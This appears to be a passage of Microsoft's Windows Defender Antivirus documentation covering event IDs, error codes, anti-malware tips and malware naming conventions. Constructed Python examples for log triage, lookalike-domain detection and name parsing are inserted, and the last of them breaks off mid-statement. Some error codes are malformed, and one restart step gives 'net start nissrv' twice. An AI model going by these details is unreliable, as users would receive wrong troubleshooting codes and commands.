User action: Check your Internet connectivity settings. The Windows Defender Antivirus client encountered an error when using the Dynamic Signature Service to download the latest definitions for a specific threat. This error is likely caused by a network connectivity issue.

EVENT ID: 2030

Symbolic name: MALWAREPROTECTION_OFFLINE_SCAN_INSTALLED

Message: The antimalware engine was downloaded and is configured to run offline on the next system restart.

Description: Windows Defender Antivirus downloaded and configured offline antivirus to run on the next reboot.

EVENT ID: 2031

Symbolic name: MALWAREPROTECTION_OFFLINE_SCAN_INSTALL_FAILED

Message: The antimalware engine was unable to download and configure an offline scan.

Description: Windows Defender Antivirus has encountered an error trying to download and configure offline antivirus.
  Error Code: <Error code>. Result code associated with threat status; standard HRESULT values.
  Error Description: <Error description>. Description of the error.

EVENT ID: 2040

Symbolic name: MALWAREPROTECTION_OS_EXPIRING

Message: Antimalware support for this operating system version will soon end.

Description: The support for your operating system will expire shortly. Running Windows Defender Antivirus on an out-of-support operating system is not an adequate solution to protect against threats.

EVENT ID: 2041


Symbolic name: MALWAREPROTECTION_OS_EOL

Message: Antimalware support for this operating system has ended. You must upgrade the operating system for continued support.

Description: The support for your operating system has expired. Running Windows Defender Antivirus on an out-of-support operating system is not an adequate solution to protect against threats.

EVENT ID: 2042

Symbolic name: MALWAREPROTECTION_PROTECTION_EOL

Message: The antimalware engine no longer supports this operating system, and is no longer protecting your
system from malware.

Description: The support for your operating system has expired. Windows
Defender Antivirus is no longer supported on your operating
system, has stopped functioning, and is not protecting
against malware threats.

EVENT ID: 3002

Symbolic name: MALWAREPROTECTION_RTP_FEATURE_FAILURE

Message: Real-time protection encountered an error and failed.

Description: Windows Defender Antivirus Real-Time Protection feature has encountered an error and failed.
Feature: <Feature>, for example:
On Access
Internet Explorer downloads and Microsoft Outlook Express attachments
Behavior monitoring
Network Inspection System
Error Code: <Error code>
Result code associated with threat status. Standard HRESULT values.
Error Description: <Error description>
Description of the error.
Reason: The reason Windows Defender Antivirus real-time protection has restarted a feature.

User action: You should restart the system then run a full scan because
it's possible the system was not protected for some time. The
Windows Defender Antivirus client's real-time protection
feature encountered an error because one of the services
failed to start. If it is followed by a 3007 event ID, the failure
was temporary and the antimalware client recovered from
the failure.

EVENT ID: 3007

Symbolic name: MALWAREPROTECTION_RTP_FEATURE_RECOVERED

Message: Real-time protection recovered from a failure. We recommend running a full system scan when you see
this error.

Description: Windows Defender Antivirus Real-time Protection has restarted a feature. It is recommended that
you run a full system scan to detect any items that may have been missed while this agent was down.
Feature: <Feature>, for example:
On Access
IE downloads and Outlook Express attachments
Behavior monitoring
Network Inspection System
Reason: The reason Windows Defender Antivirus real-time protection has restarted a feature.

User action: The real-time protection feature has restarted. If this event
happens again, contact Microsoft Technical Support.

EVENT ID: 5000

Symbolic name: MALWAREPROTECTION_RTP_ENABLED

Message: Real-time protection is enabled.

Description: Windows Defender Antivirus real-time protection scanning for malware and other potentially
unwanted software was enabled.

EVENT ID: 5001

Symbolic name: MALWAREPROTECTION_RTP_DISABLED

Message: Real-time protection is disabled.

Description: Windows Defender Antivirus real-time protection scanning for malware and other potentially
unwanted software was disabled.

EVENT ID: 5004

Symbolic name: MALWAREPROTECTION_RTP_FEATURE_CONFIGURED

Message: The real-time protection configuration changed.

Description: Windows Defender Antivirus real-time protection feature configuration has changed.
Feature: <Feature>, for example:
On Access
IE downloads and Outlook Express attachments
Behavior monitoring
Network Inspection System
Configuration:

EVENT ID: 5007

Symbolic name: MALWAREPROTECTION_CONFIG_CHANGED

Message: The antimalware platform configuration changed.

Description: Windows Defender Antivirus configuration has changed. If this is an unexpected event you should
review the settings as this may be the result of malware.
Old value: <Old value number>
Old antivirus configuration value.
New value: <New value number>
New antivirus configuration value.

EVENT ID: 5008

Symbolic name: MALWAREPROTECTION_ENGINE_FAILURE

Message: The antimalware engine encountered an error and failed.

Description: Windows Defender Antivirus engine has been terminated due to an unexpected error.
Failure Type: <Failure type>, for example: Crash or Hang
Exception Code: <Error code>
Resource: <Resource>

User action: To troubleshoot this event:
1. Try to restart the service.
   For antimalware, antivirus and spyware, at an elevated command prompt, type net stop msmpsvc, and then
   type net start msmpsvc to restart the antimalware engine.
   For the Network Inspection System, at an elevated command prompt, type net start nissrv, and then type
   net start nissrv to restart the Network Inspection System engine by using the NiSSRV.exe file.
2. If it fails in the same way, look up the error code by accessing the Microsoft Support Site and entering
   the error number in the Search box, and contact Microsoft Technical Support.

User action: The Windows Defender Antivirus client engine stopped due to an unexpected error. To troubleshoot
this event:
1. Run the scan again.
2. If it fails in the same way, go to the Microsoft Support site, enter the error number in the Search box to
   look for the error code.
3. Contact Microsoft Technical Support.

EVENT ID: 5009

Symbolic name: MALWAREPROTECTION_ANTISPYWARE_ENABLED

Message: Scanning for malware and other potentially unwanted software is enabled.

Description: Windows Defender Antivirus scanning for malware and other potentially unwanted software has been
enabled.

EVENT ID: 5010

Symbolic name: MALWAREPROTECTION_ANTISPYWARE_DISABLED

Message: Scanning for malware and other potentially unwanted software is disabled.

Description: Windows Defender Antivirus scanning for malware and other potentially unwanted software is
disabled.

EVENT ID: 5011

Symbolic name: MALWAREPROTECTION_ANTIVIRUS_ENABLED

Message: Scanning for viruses is enabled.

Description: Windows Defender Antivirus scanning for viruses has been enabled.

EVENT ID: 5012

Symbolic name: MALWAREPROTECTION_ANTIVIRUS_DISABLED

Message: Scanning for viruses is disabled.

Description: Windows Defender Antivirus scanning for viruses is disabled.

EVENT ID: 5100

Symbolic name: MALWAREPROTECTION_EXPIRATION_WARNING_STATE

Message: The antimalware platform will expire soon.

Description: Windows Defender Antivirus has entered a grace period and will soon expire. After expiration,
this program will disable protection against viruses, spyware, and other potentially unwanted software.
Expiration Reason: The reason Windows Defender Antivirus will expire.
Expiration Date: The date Windows Defender Antivirus will expire.

EVENT ID: 5101

Symbolic name: MALWAREPROTECTION_DISABLED_EXPIRED_STATE

Message: The antimalware platform is expired.

Description: Windows Defender Antivirus grace period has expired. Protection against viruses, spyware, and
other potentially unwanted software is disabled.
Expiration Reason:
Expiration Date:
Error Code: <Error code>
Result code associated with threat status. Standard HRESULT values.
Error Description: <Error description>
Description of the error.
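The triage rules the event descriptions above spell out (protection disabled or configuration changed deserves review; a 3002 followed by a 3007 on the same host was a temporary failure), as an added example that is not part of the Microsoft documentation. The log format and the sample lines are constructed for this example, not real Defender output.

```python
"""Triage of Windows Defender Antivirus operational events.

Added example, not part of the Microsoft documentation it follows. It maps the
event IDs listed in this section to their symbolic names and applies the
triage rules the event descriptions give: protection being disabled or the
configuration changing unexpectedly deserves review, and a 3002 real-time
protection failure that is followed by a 3007 on the same host was temporary.
Log lines are constructed samples in a simple "timestamp host event_id"
format, not real Defender output.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

# Symbolic names from this section, with the triage severity a defender would
# assign ("info" events are not reported).
EVENTS: Dict[int, Tuple[str, str]] = {
    2030: ("MALWAREPROTECTION_OFFLINE_SCAN_INSTALLED", "info"),
    2031: ("MALWAREPROTECTION_OFFLINE_SCAN_INSTALL_FAILED", "warning"),
    2040: ("MALWAREPROTECTION_OS_EXPIRING", "warning"),
    2041: ("MALWAREPROTECTION_OS_EOL", "high"),
    2042: ("MALWAREPROTECTION_PROTECTION_EOL", "high"),
    3002: ("MALWAREPROTECTION_RTP_FEATURE_FAILURE", "high"),
    3007: ("MALWAREPROTECTION_RTP_FEATURE_RECOVERED", "info"),
    5000: ("MALWAREPROTECTION_RTP_ENABLED", "info"),
    5001: ("MALWAREPROTECTION_RTP_DISABLED", "high"),
    5004: ("MALWAREPROTECTION_RTP_FEATURE_CONFIGURED", "medium"),
    5007: ("MALWAREPROTECTION_CONFIG_CHANGED", "medium"),
    5008: ("MALWAREPROTECTION_ENGINE_FAILURE", "high"),
    5009: ("MALWAREPROTECTION_ANTISPYWARE_ENABLED", "info"),
    5010: ("MALWAREPROTECTION_ANTISPYWARE_DISABLED", "high"),
    5011: ("MALWAREPROTECTION_ANTIVIRUS_ENABLED", "info"),
    5012: ("MALWAREPROTECTION_ANTIVIRUS_DISABLED", "high"),
    5100: ("MALWAREPROTECTION_EXPIRATION_WARNING_STATE", "warning"),
    5101: ("MALWAREPROTECTION_DISABLED_EXPIRED_STATE", "high"),
}

# Events that mean the endpoint is no longer being protected.
PROTECTION_DISABLED = {5001, 5010, 5012, 5101}


@dataclass
class Event:
    timestamp: str
    host: str
    event_id: int


@dataclass
class Finding:
    host: str
    event_id: int
    name: str
    severity: str
    note: str


def parse_line(line: str) -> Event:
    """Parse one constructed log line: '<timestamp> <host> <event_id>'."""
    timestamp, host, event_id = line.split()
    return Event(timestamp, host, int(event_id))


def triage(lines: Iterable[str]) -> List[Finding]:
    """Return findings for every non-informational event, in log order."""
    events = [parse_line(line) for line in lines if line.strip()]
    findings: List[Finding] = []
    for index, event in enumerate(events):
        if event.event_id not in EVENTS:
            continue  # not an event this section documents
        name, severity = EVENTS[event.event_id]
        note = ""
        if event.event_id == 3002:
            # Per the 3002 description: a later 3007 means the failure was temporary.
            recovered = any(later.host == event.host and later.event_id == 3007
                            for later in events[index + 1:])
            if recovered:
                severity = "medium"
                note = "temporary: followed by 3007; run a full scan anyway"
            else:
                note = "no 3007 recovery seen; restart the system and run a full scan"
        elif event.event_id == 5007:
            note = "review settings: an unexpected change may be the result of malware"
        elif event.event_id in PROTECTION_DISABLED:
            note = "protection is off; confirm this was an authorized change"
        if severity == "info":
            continue
        findings.append(Finding(event.host, event.event_id, name, severity, note))
    return findings


# Constructed sample log (not real Defender output).
SAMPLE_LOG = """
2019-04-05T09:00:01Z WS01 5000
2019-04-05T09:05:10Z WS01 3002
2019-04-05T09:05:12Z WS01 3007
2019-04-05T09:30:00Z WS02 5001
2019-04-05T09:31:00Z WS02 5007
2019-04-05T10:00:00Z WS03 3002
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG.splitlines()):
        print(f"{finding.severity:7} {finding.host} {finding.event_id} "
              f"{finding.name}: {finding.note}")
```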

Windows Defender Antivirus client error codes

If Windows Defender Antivirus experiences any issues it will usually give you an error code to help you
troubleshoot the issue. Most often an error means there was a problem installing an update. This section
provides the following information about Windows Defender Antivirus client errors:
The error code
The possible reason for the error
Advice on what to do now
Use the information in these tables to help troubleshoot Windows Defender Antivirus error codes.

ERROR CODE: 0X80508007

Message: ERR_MP_NO_MEMORY

Possible reason: This error indicates that you might have run out of memory.

Resolution:
1. Check the available memory on your device.
2. Close any unused applications that are running to free up memory on your device.
3. Restart the device and run the scan again.

ERROR CODE: 0X8050800C

Message: ERR_MP_BAD_INPUT_DATA

Possible reason: This error indicates that there might be a problem with your security product.

Resolution:
1. Update the definitions. Either:
   a. Click the Update definitions button on the Update tab in Windows Defender Antivirus. Or,
   b. Download the latest definitions from the Windows Defender Security Intelligence site.
      Note: The size of the definitions file downloaded from the site can exceed 60 MB and should not be
      used as a long-term solution for updating definitions.
2. Run a full scan.
3. Restart the device and try again.

ERROR CODE: 0X80508020

Message: ERR_MP_BAD_CONFIGURATION

Possible reason: This error indicates that there might be an engine configuration error; commonly, this is
related to input data that does not allow the engine to function properly.

ERROR CODE: 0X805080211

Message: ERR_MP_QUARANTINE_FAILED

Possible reason: This error indicates that Windows Defender Antivirus failed to quarantine a threat.

ERROR CODE: 0X80508022

Message: ERR_MP_REBOOT_REQUIRED

Possible reason: This error indicates that a reboot is required to complete threat removal.

ERROR CODE: 0X80508023

Message: ERR_MP_THREAT_NOT_FOUND

Possible reason: This error indicates that the threat might no longer be present on the media, or malware
might be stopping you from scanning your device.

Resolution: Run the Microsoft Safety Scanner then update your security software and try again.

ERROR CODE: 0X80508024

Message: ERR_MP_FULL_SCAN_REQUIRED

Possible reason: This error indicates that a full system scan might be required.

Resolution: Run a full system scan.

ERROR CODE: 0X80508025

Message: ERR_MP_MANUAL_STEPS_REQUIRED

Possible reason: This error indicates that manual steps are required to complete threat removal.

Resolution: Follow the manual remediation steps outlined in the Microsoft Malware Protection Encyclopedia. You
can find a threat-specific link in the event history.

ERROR CODE: 0X80508026

Message: ERR_MP_REMOVE_NOT_SUPPORTED

Possible reason: This error indicates that removal inside the container type might not be supported.

Resolution: Windows Defender Antivirus is not able to remediate threats detected inside the archive. Consider
manually removing the detected resources.

ERROR CODE: 0X80508027

Message: ERR_MP_REMOVE_LOW_MEDIUM_DISABLED

Possible reason: This error indicates that removal of low and medium threats might be disabled.

Resolution: Check the detected threats and resolve them as required.

ERROR CODE: 0X80508029

Message: ERROR_MP_RESCAN_REQUIRED

Possible reason: This error indicates a rescan of the threat is required.

Resolution: Run a full system scan.

ERROR CODE: 0X80508030

Message: ERROR_MP_CALLISTO_REQUIRED

Possible reason: This error indicates that an offline scan is required.

Resolution: Run offline Windows Defender Antivirus. You can read about how to do this in the offline Windows
Defender Antivirus article.

ERROR CODE: 0X80508031

Message: ERROR_MP_PLATFORM_OUTDATED

Possible reason: This error indicates that Windows Defender Antivirus does not support the current version of
the platform and requires a new version of the platform.

Resolution: You can only use Windows Defender Antivirus in Windows 10. For Windows 8, Windows 7 and Windows
Vista, you can use System Center Endpoint Protection.

The following error codes are used during internal testing of Windows Defender Antivirus.
If you see these errors, you can try to update definitions and force a rescan directly on the endpoint.

INTERNAL ERROR CODES

ERROR CODE    MESSAGE DISPLAYED                            POSSIBLE REASON FOR ERROR AND RESOLUTION

0x80501004    ERROR_MP_NO_INTERNET_CONN                    Check your Internet connection, then run the
                                                           scan again.
0x80501000    ERROR_MP_UI_CONSOLIDATION_BASE               This is an internal error. The cause is not
                                                           clearly defined.
0x80501001    ERROR_MP_ACTIONS_FAILED
0x80501002    ERROR_MP_NOENGINE
0x80501003    ERROR_MP_ACTIVE_THREATS
0x805011011   MP_ERROR_CODE_LUA_CANCELLED
0x80501101    ERROR_LUA_CANCELLATION
0x80501102    MP_ERROR_CODE_ALREADY_SHUTDOWN
0x80501103    MP_ERROR_CODE_RDEVICE_S_ASYNC_CALL_PENDING
0x80501104    MP_ERROR_CODE_CANCELLED
0x80501105    MP_ERROR_CODE_NO_TARGETOS
0x80501106    MP_ERROR_CODE_BAD_REGEXP
0x80501107    MP_ERROR_TEST_INDUCED_ERROR
0x80501108    MP_ERROR_SIG_BACKUP_DISABLED
0x80508001    ERR_MP_BAD_INIT_MODULES
0x80508002    ERR_MP_BAD_DATABASE
0x80508004    ERR_MP_BAD_UFS
0x8050800C    ERR_MP_BAD_INPUT_DATA
0x8050800D    ERR_MP_BAD_GLOBAL_STORAGE
0x8050800E    ERR_MP_OBSOLETE
0x8050800F    ERR_MP_NOT_SUPPORTED
0x80508010    ERR_MP_NO_MORE_ITEMS
0x80508011    ERR_MP_DUPLICATE_SCANID
0x80508012    ERR_MP_BAD_SCANID
0x80508013    ERR_MP_BAD_USERDB_VERSION
0x80508014    ERR_MP_RESTORE_FAILED
0x80508016    ERR_MP_BAD_ACTION
0x80508019    ERR_MP_NOT_FOUND
0x80509001    ERR_RELO_BAD_EHANDLE
0x80509003    ERR_RELO_KERNEL_NOT_LOADED
0x8050A001    ERR_MP_BADDB_OPEN
0x8050A002    ERR_MP_BADDB_HEADER
0x8050A003    ERR_MP_BADDB_OLDENGINE
0x8050A004    ERR_MP_BADDB_CONTENT
0x8050A005    ERR_MP_BADDB_NOTSIGNED
0x8050801     ERR_MP_REMOVE_FAILED                         This is an internal error. It might be triggered
                                                           when malware removal is not successful.
0x80508018    ERR_MP_SCAN_ABORTED                          This is an internal error. It might have
                                                           triggered when a scan fails to complete.
Related topics
Report on Windows Defender Antivirus protection
Windows Defender Antivirus in Windows 10
Security intelligence
4/5/2019

Here you will find information about different types of malware, safety tips on how you can protect your
organization, and resources for industry collaboration programs.
Understand malware & other threats
How Microsoft identifies malware and PUA
Submit files for analysis
Safety Scanner download
Keep up with the latest malware news and research. Check out our Windows security blogs and follow us on
Twitter for the latest news, discoveries, and protections.
Learn more about Windows security.
Understanding malware & other threats
4/8/2019

Malware is a term used to describe malicious applications and code that can cause damage and disrupt normal use
of devices. Malware can allow unauthorized access, use system resources, steal passwords, lock you out of your
computer and ask for ransom, and more.
Cybercriminals that distribute malware are often motivated by money and will use infected computers to launch
attacks, obtain banking credentials, collect information that can be sold, sell access to computing resources, or
extort payment from victims.
As criminals become more sophisticated with their attacks, Microsoft is here to help. Windows 10 is the most
secure version of Windows yet and includes many features to help protect you whether you're at home, at work, or
on the go. With Windows Defender Advanced Threat Protection (Windows Defender ATP), businesses can stay
protected with next-generation protection and other security capabilities.
For good general tips, check out the prevent malware infection topic.
There are many types of malware, including:
Coin miners
Exploits and exploit kits
Macro malware
Phishing
Ransomware
Rootkits
Supply chain attacks
Tech support scams
Trojans
Unwanted software
Worms
Keep up with the latest malware news and research. Check out our Windows security blogs and follow us on
Twitter for the latest news, discoveries, and protections.
Learn more about Windows security.
Prevent malware infection
4/8/2019

Malware authors are always looking for new ways to infect computers. Follow the simple tips below to stay
protected and minimize threats to your data and accounts.

Keep software up-to-date


Exploits typically use vulnerabilities in popular software such as web browsers, Java, Adobe Flash Player, and
Microsoft Office to infect devices. Software updates patch vulnerabilities so they aren't available to exploits
anymore.
To keep Microsoft software up to date, ensure that automatic Microsoft Updates are enabled. Also, upgrade to the
latest version of Windows to benefit from a host of built-in security enhancements.

Be wary of links and attachments


Email and other messaging tools are a few of the most common ways your device can get infected. Attachments
or links in messages can open malware directly or can stealthily trigger a download. Some emails will give
instructions to allow macros or other executable content designed to make it easier for malware to infect your
devices.
Use an email service that provides protection against malicious attachments, links, and abusive senders.
Microsoft Office 365 has built-in antimalware, link protection, and spam filtering.
For more information, see phishing.

Watch out for malicious or compromised websites


By visiting malicious or compromised sites, your device can get infected with malware automatically or you can
get tricked into downloading and installing malware. See exploits and exploit kits as an example of how some of
these sites can automatically install malware to visiting computers.
To identify potentially harmful websites, keep the following in mind:
The initial part (domain) of a website address should represent the company that owns the site you are
visiting. Check the domain for misspellings. For example, malicious sites commonly use domain names
that swap the letter O with a zero (0) or the letters L and I with a one (1). If example.com is spelled
examp1e.com, the site you are visiting is suspect.
Sites that aggressively open popups and display misleading buttons often trick users into accepting
content through constant popups or mislabeled buttons.
To block malicious websites, use a modern web browser like Microsoft Edge which identifies phishing and
malware websites and checks downloads for malware.
If you encounter an unsafe site, click More [...] > Send feedback on Microsoft Edge. You can also report unsafe
sites directly to Microsoft.
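The letter-swap check the tips above describe (O for zero, L and I for one), as an added example that is not from the Microsoft page: it undoes the swaps on both a candidate domain and a trusted list and reports a candidate that only matches after the swaps are undone. The trusted list and sample URLs are constructed, and the registrable domain is approximated as the last two host labels (no public suffix list).

```python
"""Lookalike-domain check for the letter swaps described above.

Added example, not from the Microsoft page. The text warns that malicious
sites swap the letter O for a zero and the letters L and I for a one; this
folds those characters onto one canonical letter on both the candidate and a
list of trusted domains and reports a candidate that matches a trusted domain
only after folding. The trusted list and the sample URLs are constructed, and
the registrable domain is approximated as the last two labels of the host.
"""
from typing import Optional, Set
from urllib.parse import urlsplit

TRUSTED: Set[str] = {"example.com", "microsoft.com"}  # constructed allowlist

# Characters the page says get swapped, folded onto the letter they imitate.
FOLD = str.maketrans({"0": "o", "1": "l", "i": "l"})


def registrable_domain(url: str) -> str:
    """Host of the URL reduced to its last two labels, lower-cased (approximation)."""
    host = urlsplit(url if "://" in url else "http://" + url).hostname or ""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def fold(domain: str) -> str:
    """Canonical spelling with the O/0 and L/I/1 confusables collapsed."""
    return domain.translate(FOLD)


def lookalike_of(url: str) -> Optional[str]:
    """Trusted domain this URL imitates, or None if it is trusted or unrelated."""
    domain = registrable_domain(url)
    if domain in TRUSTED:
        return None  # exact match: the genuine site
    folded = fold(domain)
    for trusted in TRUSTED:
        if fold(trusted) == folded:
            return trusted  # same only after undoing the swaps
    return None


if __name__ == "__main__":
    for sample in ("https://examp1e.com/login", "https://login.m1crosoft.com/",
                   "https://example.com/", "https://unrelated.org/"):
        print(sample, "->", lookalike_of(sample))
```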
Pirated material on compromised websites
Using pirated content is not only illegal, it can also expose your device to malware. Sites that offer pirated
software and media are also often used to distribute malware when the site is visited. Sometimes pirated
software is bundled with malware and other unwanted software when downloaded, including intrusive browser
plugins and adware.
Users do not openly discuss visits to these sites, so any untoward experiences are more likely to stay unreported.
To stay safe, download movies, music, and apps from official publisher websites or stores. Consider running a
streamlined OS such as Windows 10 Pro SKU S Mode, which ensures that only vetted apps from the Windows
Store are installed.

Don't attach unfamiliar removable drives


Some types of malware can spread by copying themselves to USB flash drives or other removable drives. There
are malicious individuals that intentionally prepare and distribute infected drives—leaving these drives in public
places to victimize unsuspecting individuals.
Only use removable drives that you are familiar with or that come from a trusted source. If a drive has been used
in publicly accessible devices, like computers in a café or a library, make sure you have antimalware running on
your computer before you use the drive. Avoid opening unfamiliar files you find on suspect drives, including
Office and PDF documents and executable files.

Use a non-administrator account


At the time they are launched, whether inadvertently by a user or automatically, most malware runs under the
same privileges as the active user. This means that by limiting account privileges, you can prevent malware from
making consequential changes to any devices.
By default, Windows uses User Account Control (UAC) to provide automatic, granular control of privileges—it
temporarily restricts privileges and prompts the active user every time an application attempts to make
potentially consequential changes to the system. Although UAC helps limit the privileges of admin users, users
can simply override this restriction when prompted. As a result, it is quite easy for an admin user to inadvertently
allow malware to run.
To help ensure that everyday activities do not result in malware infection and other potentially catastrophic
changes, it is recommended that you use a non-administrator account for regular use. By using a non-
administrator account, you can prevent installation of unauthorized apps and prevent inadvertent changes to
system settings. Avoid browsing the web or checking email using an account with administrator privileges.
Whenever necessary, log in as an administrator to install apps or make configuration changes that require admin
privileges.
Read about creating user accounts and giving administrator privileges

Other safety tips


To further ensure that data is protected from malware as well as other threats:
Back up files. Follow the 3-2-1 rule: make 3 copies, store in at least 2 locations, with at least 1 offline
copy. Use OneDrive for reliable cloud-based copies that allow access to files from multiple devices and
help recover damaged or lost files, including files locked by ransomware.
Be wary when connecting to public hotspots, particularly those that do not require authentication.
Use strong passwords and enable multi-factor authentication.
Do not use untrusted devices to log on to email, social media, and corporate accounts.

Software solutions
Microsoft provides comprehensive security capabilities that help protect against threats. We recommend:
Automatic Microsoft updates keep software up-to-date to get the latest protections.
Controlled folder access stops ransomware in its tracks by preventing unauthorized access to your
important files. Controlled folder access locks down folders, allowing only authorized apps to access files.
Unauthorized apps, including ransomware and other malicious executable files, DLLs, and scripts are
denied access.
Microsoft Edge browser protects against threats such as ransomware by preventing exploit kits from
running. By using Microsoft SmartScreen, Microsoft Edge blocks access to malicious websites.
Microsoft Exchange Online Protection (EOP) offers enterprise-class reliability and protection against spam
and malware, while maintaining access to email during and after emergencies.
Microsoft Safety Scanner helps remove malicious software from computers. NOTE: This tool does not
replace your antimalware product.
Microsoft 365 includes Office 365, Windows 10, and Enterprise Mobility + Security. These resources
power productivity while providing intelligent security across users, devices, and data.
Office 365 Advanced Threat Protection includes machine learning capabilities that block dangerous
emails, including millions of emails carrying ransomware downloaders.
OneDrive for Business can back up files, which you would then use to restore files in the event of an
infection.
Windows Defender Advanced Threat Protection provides comprehensive endpoint protection, detection,
and response capabilities to help prevent ransomware. In the event of a breach, Windows Defender ATP
alerts security operations teams about suspicious activities and automatically attempts to resolve the
problem. This includes alerts for suspicious PowerShell commands, connecting to a TOR website,
launching self-replicated copies, and deletion of volume shadow copies. Try Windows Defender ATP free
of charge.
Windows Hello for Business replaces passwords with strong two-factor authentication on your devices.
This authentication consists of a new type of user credential that is tied to a device and uses a biometric or
PIN. It lets users authenticate to an Active Directory or Azure Active Directory account.
Earlier than Windows 10 (not recommended)
Microsoft Security Essentials provides real-time protection for your home or small business device that
guards against viruses, spyware, and other malicious software.

What to do with a malware infection


Windows Defender ATP antivirus capabilities help reduce the chances of infection and will automatically remove
threats they detect.
In case threat removal is unsuccessful, read about troubleshooting malware detection and removal problems.
Malware names
4/8/2019

We name the malware and unwanted software that we detect according to the Computer Antivirus Research
Organization (CARO) malware naming scheme. The scheme uses the following format:

When our analysts research a particular threat, they will determine what each of the components of the name will
be.

Type
Describes what the malware does on your computer. Worms, viruses, trojans, backdoors, and ransomware are
some of the most common types of malware.
Adware
Backdoor
Behavior
BrowserModifier
Constructor
DDoS
Exploit
Hacktool
Joke
Misleading
MonitoringTool
Program
PWS
Ransom
RemoteAccess
Rogue
SettingsModifier
SoftwareBundler
Spammer
Spoofer
Spyware
Tool
Trojan
TrojanClicker
TrojanDownloader
TrojanNotifier
TrojanProxy
TrojanSpy
VirTool
Virus
Worm

Platforms
Indicates the operating system (such as Windows, Mac OS X, and Android) that the malware is designed to work
on. The platform is also used to indicate programming languages and file formats.
Operating systems
AndroidOS: Android operating system
DOS: MS-DOS platform
EPOC: Psion devices
FreeBSD: FreeBSD platform
iPhoneOS: iPhone operating system
Linux: Linux platform
MacOS: MAC 9.x platform or earlier
MacOS_X: MacOS X or later
OS2: OS2 platform
Palm: Palm operating system
Solaris: System V-based Unix platforms
SunOS: Unix platforms 4.1.3 or lower
SymbOS: Symbian operating system
Unix: general Unix platforms
Win16: Win16 (3.1) platform
Win2K: Windows 2000 platform
Win32: Windows 32-bit platform
Win64: Windows 64-bit platform
Win95: Windows 95, 98 and ME platforms
Win98: Windows 98 platform only
WinCE: Windows CE platform
WinNT: WinNT
Scripting languages
ABAP: Advanced Business Application Programming scripts
ALisp: ALisp scripts
AmiPro: AmiPro script
ANSI: American National Standards Institute scripts
AppleScript: compiled Apple scripts
ASP: Active Server Pages scripts
AutoIt: AutoIT scripts
BAS: Basic scripts
BAT: Basic scripts
CorelScript: Corelscript scripts
HTA: HTML Application scripts
HTML: HTML Application scripts
INF: Install scripts
IRC: mIRC/pIRC scripts
Java: Java binaries (classes)
JS: Javascript scripts
LOGO: LOGO scripts
MPB: MapBasic scripts
MSH: Monad shell scripts
MSIL: .Net intermediate language scripts
Perl: Perl scripts
PHP: Hypertext Preprocessor scripts
Python: Python scripts
SAP: SAP platform scripts
SH: Shell scripts
VBA: Visual Basic for Applications scripts
VBS: Visual Basic scripts
WinBAT: Winbatch scripts
WinHlp: Windows Help scripts
WinREG: Windows registry scripts
Macros
A97M: Access 97, 2000, XP, 2003, 2007, and 2010 macros
HE: macro scripting
O97M: Office 97, 2000, XP, 2003, 2007, and 2010 macros - those that affect Word, Excel, and Powerpoint
PP97M: PowerPoint 97, 2000, XP, 2003, 2007, and 2010 macros
V5M: Visio5 macros
W1M: Word1Macro
W2M: Word2Macro
W97M: Word 97, 2000, XP, 2003, 2007, and 2010 macros
WM: Word 95 macros
X97M: Excel 97, 2000, XP, 2003, 2007, and 2010 macros
XF: Excel formulas
XM: Excel 95 macros
Other file types
ASX: XML metafile of Windows Media .asf files
HC: HyperCard Apple scripts
MIME: MIME packets
Netware: Novell Netware files
QT: Quicktime files
SB: StarBasic (StarOffice XML) files
SWF: Shockwave Flash files
TSQL: MS SQL server files
XML: XML files

Family
Grouping of malware based on common characteristics, including attribution to the same authors. Security
software providers sometimes use different names for the same malware family.

Variant letter
Used sequentially for every distinct version of a malware family. For example, the detection for the variant ".AF"
would have been created after the detection for the variant ".AE".

Suffixes
Provides extra detail about the malware, including how it is used as part of a multicomponent threat. In the
example above, "!lnk" indicates that the threat component is a shortcut file used by Trojan:Win32/Reveton.T.
.dam: damaged malware
.dll: Dynamic Link Library component of a malware
.dr: dropper component of a malware
.gen: malware that is detected using a generic signature
.kit: virus constructor
.ldr: loader component of a malware
.pak: compressed malware
.plugin: plug-in component
.remnants: remnants of a virus
.worm: worm component of that malware
!bit: an internal category used to refer to some threats
!cl: an internal category used to refer to some threats
!dha: an internal category used to refer to some threats
!pfn: an internal category used to refer to some threats
!plock: an internal category used to refer to some threats
!rfn: an internal category used to refer to some threats
!rootkit: rootkit component of that malware
@m: worm mailers
@mm: mass mailer worm
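A parser for detection names built from the components this section defines (Type, Platform, Family, Variant letter, Suffixes), as an added example that is not Microsoft's code. It assumes the Type:Platform/Family.Variant!Suffix layout shown by the section's own example, Trojan:Win32/Reveton.T!lnk, and the ".", "!" and "@" suffix prefixes from the suffix list; the Type set is copied from the list above and the Platform set is a subset of it, so an unlisted value is reported as a warning rather than an error.

```python
"""Parser for detection names in the format this section describes.

Added example, not Microsoft's code. It splits a detection name into the
components the headings above define (Type, Platform, Family, Variant letter,
Suffixes), assuming the "Type:Platform/Family.Variant!Suffix" layout shown by
the section's own example, Trojan:Win32/Reveton.T!lnk. The Type set is the
list above; the Platform set is a subset of it, so unlisted values only warn.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

TYPES = {
    "Adware", "Backdoor", "Behavior", "BrowserModifier", "Constructor", "DDoS",
    "Exploit", "Hacktool", "Joke", "Misleading", "MonitoringTool", "Program",
    "PWS", "Ransom", "RemoteAccess", "Rogue", "SettingsModifier",
    "SoftwareBundler", "Spammer", "Spoofer", "Spyware", "Tool", "Trojan",
    "TrojanClicker", "TrojanDownloader", "TrojanNotifier", "TrojanProxy",
    "TrojanSpy", "VirTool", "Virus", "Worm",
}
PLATFORMS = {  # subset of the platform list above
    "AndroidOS", "DOS", "Linux", "MacOS_X", "Win32", "Win64", "Java", "JS",
    "MSIL", "VBS", "O97M", "W97M", "X97M", "HTML", "PHP", "Python", "SWF",
}
SUFFIXES = {  # from the suffix list; "!lnk" from the Reveton example text
    ".dam": "damaged malware", ".dll": "Dynamic Link Library component",
    ".dr": "dropper component", ".gen": "detected using a generic signature",
    ".kit": "virus constructor", ".ldr": "loader component",
    ".pak": "compressed malware", ".plugin": "plug-in component",
    ".remnants": "remnants of a virus", ".worm": "worm component",
    "!rootkit": "rootkit component", "!lnk": "shortcut file component",
    "@m": "worm mailer", "@mm": "mass mailer worm",
}

# Variant letters are upper case; suffixes are lower case after '.', '!' or '@'.
NAME_RE = re.compile(
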